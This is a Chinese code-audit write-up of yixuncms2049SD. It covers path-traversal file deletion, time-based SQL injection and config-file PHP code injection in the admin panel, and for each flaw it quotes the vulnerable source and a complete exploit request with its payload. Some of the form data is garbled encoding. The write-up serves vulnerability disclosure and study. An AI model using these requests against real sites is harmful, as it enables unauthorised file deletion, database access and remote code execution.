代碼審計之_yixuncms2049SD漏洞
存在漏洞
1.後臺任意文件刪除
2.後臺sql注入
3.後臺getshell
1.後臺任意文件刪除
在\admin\controls\databak.class.php
function del(){
$filename = $_GET['file'];
$dirname=PROJECT_PATH.'databak/'.$filename;
unlink($dirname);
$this->filelist();
$this->mess("刪除成功",true);
$this->display("index");
}
沒有對傳入的數據進行過濾,通過構造數據包即可刪除\runtime\install.lock,實現網站重裝
GET /admin.php/databak/del/?file=../12.txt HTTP/1.1
Host: 192.168.164.138:89
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.164.138:89/admin.php/databak/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f1mrgusuvefsvg9rkqlubjrh24; XDEBUG_SESSION=12359
Connection: close
2.後臺sql注入
在後臺其他位置處理都非常嚴格的情況下,\yixuncms2049SD\php\bases\db.class.php
function total(){
$where="";
$data=array();
$args=func_get_args();
if(count($args)>0){
$where = $this->comWhere($args);
$data=$where["data"];
$where= $where["where"];
}else if($this->sql["where"] != ""){
$where=$this->comWhere($this->sql["where"]);
$data=$where["data"];
$where=$where["where"];
}
$sql="SELECT COUNT(*) as count FROM {$this->tabName}{$where}";
return $this->query($sql, __METHOD__,$data);
}
這裏對傳入的數據使用了預編譯語句,但是看下面這個方法
static function unique($value, $msg, $rules, $name) {
if(self::$db->where("$name='$value'")->total() > 0){
self::$msg[]=$msg;
self::$flag=false;
}
}
這個方法並沒有對語句進行預編譯處理
data數組也爲空,從而導致了sql注入的存在
POST /admin.php/user/insert HTTP/1.1
Host: 192.168.164.138:89
Content-Length: 138
Cache-Control: max-age=0
Origin: http://192.168.164.138:89
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.164.138:89/admin.php/user/insert
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f1mrgusuvefsvg9rkqlubjrh24; XDEBUG_SESSION=15368
Connection: close
gid=1&username=180' AND (SELECT 4402 FROM (SELECT(SLEEP(5)))zmRm) AND 'oclI'='oclI&userpwd=123456&repwd=123456&email=123123%40qq.com&sex=1
3.後臺getshell
在\admin\controls\base.class.php
function set(){
if(BaseSet::writeConfig($_POST)){
$this->redirect('baseset','stats/1/mess/'.base64_encode('設置成功'));
}else{
$this->redirect('baseset','stats/0/mess/'.base64_encode('設置失敗,請檢查'));
}
}
跟蹤writeConfig
static function writeConfig($post){
$confile=PROJECT_PATH."config.inc.php";
$configText = file_get_contents($confile);
self::writeindex($post['appStyle'], $post['cstart']);
$reg=array(
"/define\(\"CTIME\".+?;/i",
"/define\(\"APP_NAME\".+?;/i",
"/define\(\"KEYWORD\".+?;/i",
"/define\(\"DESCRIPTION\".+?;/i",
"/define\(\"ICP\".+?;/i",
"/define\(\"COPY\".+?;/i",
"/define\(\"ARTICLE_PAGE_SIZE\".+?;/i",
"/define\(\"PHTURE_PAGE_SIZE\".+?;/i",
"/define\(\"HOME_COLUMN_SIZE\".+?;/i",
"/define\(\"HOME_COLUMNPAGE_SIZE\".+?;/i",
"/define\(\"POSITION\".+?;/i",
"/pictureSize\s*=\s*.+?;/i",
"/thumbSize\s*=\s*.+?;/i",
"/bannerSize\s*=\s*.+?;/i",
"/playSize\s*=\s*.+?;/i"
);
$rep=array(
"define(\"CTIME\", \"{$post['ctime']}\");",
"define(\"APP_NAME\", \"{$post['appname']}\");",
"define(\"KEYWORD\", \"{$post['keyword']}\");",
"define(\"DESCRIPTION\", \"{$post['description']}\");",
"define(\"ICP\", \"{$post['icp']}\");",
"define(\"COPY\", \"{$post['copy']}\");",
"define(\"ARTICLE_PAGE_SIZE\", \"{$post['articlePageSize']}\");",
"define(\"PHTURE_PAGE_SIZE\", \"{$post['photoPageSize']}\");",
"define(\"HOME_COLUMN_SIZE\", \"{$post['homecolumnsize']}\");",
"define(\"HOME_COLUMNPAGE_SIZE\", \"{$post['homecolumnpagesize']}\");",
"define(\"POSITION\", \"{$post['position']}\");",
"pictureSize = array('maxWidth' => {$post['maxWidth']}, 'maxHeight' => {$post['maxHeight']});",
"thumbSize = array('width' => {$post['width']}, 'height' => {$post['height']});",
"bannerSize = array('bwidth' => {$post['bwidth']}, 'bheight' => {$post['bheight']});",
"playSize = array('pwidth' => {$post['pwidth']}, 'pheight' => {$post['pheight']});"
);
if(isset($_FILES["water"])) {
$water=self::changeWater();
if($water) {
$img="/define\(\"WATER\"\s*,\s*\"(.+?)\"\);/i";
preg_match($img, $configText, $arr);
$srcimg=PROJECT_PATH."public/uploads/".$arr[1];
if(file_exists($srcimg))
unlink($srcimg);
$reg[] = $img;
$rep[] = "define(\"WATER\",\"{$water}\");";
}
}
return file_put_contents($confile, preg_replace($reg, $rep, $configText));
}
發現沒有對傳入數據進行任何過濾,通過構造數據包
POST /admin.php/base/set HTTP/1.1
Host: 192.168.164.138:89
Content-Length: 2771
Cache-Control: max-age=0
Origin: http://192.168.164.138:89
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6uAOV4o1YZEMBhVc
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.164.138:89/admin.php/base/baseset
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f1mrgusuvefsvg9rkqlubjrh24; XDEBUG_SESSION=12359
Connection: close
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="appStyle"
default
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="articlePageSize"
15
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="photoPageSize"
15
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="homecolumnsize"
3
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="homecolumnpagesize"
6
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="position"
5
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="width"
270
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="height"
200
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="maxWidth"
800
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="maxHeight"
600
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="bwidth"
1600
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="bheight"
350
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="pwidth"
255
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="pheight"
125
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="cstart"
0
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="ctime"
604800
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="appname"
YIXUNCMS2.0.4.9SDå
±äº«ç‰ˆ
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="keyword"
YIXUNCMS,易è¿
软件,网站建设,CMS,ä¼ä¸šç½‘站系统,PHP,å¼€æºç³»ç»Ÿ,å
费系统,PHPæºç
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="description"
易è¿
软件是一家专注于B/S软件应用åŠå¼€å‘的工作团队。易è¿
软件目å‰ä¸“注æœåŠ¡äºŽå›½å†
ä¸å°åž‹ä¼ä¸šæ ‡å‡†åŒ–系统åŠå„çº§é™¢æ ¡ç½‘ç«™å¹³å°åŠWEBåº”ç”¨ç³»ç»Ÿçš„è®¾è®¡ä¸Žç ”å‘ï¼Œæ—¨åœ¨é€šè¿‡æ›´åŠ ç®€æ˜“çš„æ建过程ã€æ›´ç®€æ˜“的维护特性ã€æ›´çœå¿ƒçš„系统å‡çº§ä¸ºç”¨æˆ·å¯»æ‰¾ä¸€ç§æ›´ä¸ºé«˜æ•ˆã€ç»æµŽçš„建站方å¼ã€‚
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="icp"
京ICP备00000001å·
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="copy"
12");phpinfo();//
------WebKitFormBoundary6uAOV4o1YZEMBhVc
Content-Disposition: form-data; name="mod"
修 改
------WebKitFormBoundary6uAOV4o1YZEMBhVc--
尋找前臺sql注入
發現對於前端get方法都使用了
$pid = filter_var($_GET["pid"],FILTER_VALIDATE_INT);
並且對於搜索的數據也經過了函數處理
$serkey = stripslashes(htmlspecialchars($_POST["search"],ENT_QUOTES));
包括留言板處
$arr[$key]=stripslashes(htmlspecialchars($value,ENT_QUOTES));
也對傳入的數據進行了處理,所以暫時沒有找出前臺的sql和xss漏洞。
小結
不能再熬夜了,再熬夜真的要禿頭了